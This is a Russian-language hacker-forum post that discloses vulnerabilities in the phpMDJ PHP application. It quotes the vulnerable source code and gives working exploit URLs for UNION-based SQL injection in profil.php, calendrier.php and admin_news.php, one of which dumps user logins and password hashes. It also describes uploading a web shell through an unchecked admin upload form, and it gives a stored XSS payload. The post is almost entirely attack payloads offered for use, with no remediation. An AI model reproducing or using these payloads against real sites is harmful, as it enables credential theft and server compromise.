| HAXTA4OK |
08.11.2009 12:53 |
phpMDJ
SQL-inj
Файл profil.php
PHP код:
$membre = $_GET['id'];
$sql = "SELECT a.nom AS nGroupe, u.* FROM phpmdj_users u, phpmdj_auth a WHERE u.groupe = a.id_groupe AND u.id = $membre";
Код:
http://localhost/phpMDJ/profil.php?id=-1+union+select+1,2,concat_ws(0x3a,pseudo,mdp),4,5,6,7,8,9,10,11,12,13,14,15,16+from+phpmdj_users--
Файл calendrire.php
PHP код:
$event = $_GET['id'];
....
elseif($mode == "anime")
{$sql = "SELECT * FROM phpmdj_animes WHERE id_anime = $event";
http://localhost/phpMDJ/calendrier.php?mode=anime&id=1+union+select+1,2,un hex(hex(version())),4,5,6,7--
Залитие шелла
Файл admin_download.php
PHP код:
$rep = "../documents/";
$savefile = $rep.$_FILES["userfile"]["name"];
$temp = $_FILES["userfile"]["tmp_name"];
$fichier = $_FILES["userfile"]["name"];
$titre = prepareText($_POST["titre"]);
$date = mktime();
$groupe= $_POST['groupe'];
if(move_uploaded_file($temp, $savefile))
http://localhost/phpMDJ/admin/admin_download.php?mode=ajout
Льем шелл и как видим он попадает в папку documents =>
http://localhost/phpMDJ/documents/shell.php
SQL в админке (не так важно, но все же поиск багов)
Файл admin_news
PHP код:
$news = $_GET['id_news'];
...
elseif($mode == "edit")
{
$sql = "SELECT * FROM phpmdj_news WHERE id_news = $news";
http://localhost/phpMDJ/admin/admin_news.php?mode=edit&id_news=-2+union+select+1,2,version(),4,5,6--
aXSS
Отправляем письмо c заголовком <script>alert()</script>
|
